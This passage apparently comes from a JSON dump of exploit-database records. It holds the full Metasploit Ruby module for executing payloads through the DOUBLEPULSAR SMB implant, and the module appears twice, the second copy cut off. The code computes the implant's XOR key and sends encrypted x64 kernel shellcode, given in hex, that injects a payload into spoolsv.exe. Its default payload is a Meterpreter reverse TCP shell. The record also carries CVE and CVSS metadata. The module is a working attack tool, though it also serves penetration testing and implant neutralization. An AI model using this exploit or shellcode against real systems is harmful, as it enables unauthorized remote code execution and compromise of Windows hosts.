0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-22] #"}, "lastseen": "2021-09-22T06:21:08", "differentElements": ["sourceData"], "edition": 22}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "1983fef7ddbfa6ccccc661576a2b2284", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-22T22:15:46", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27802"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", 
"MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:42030"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-22T22:15:46", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-22T22:15:46", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
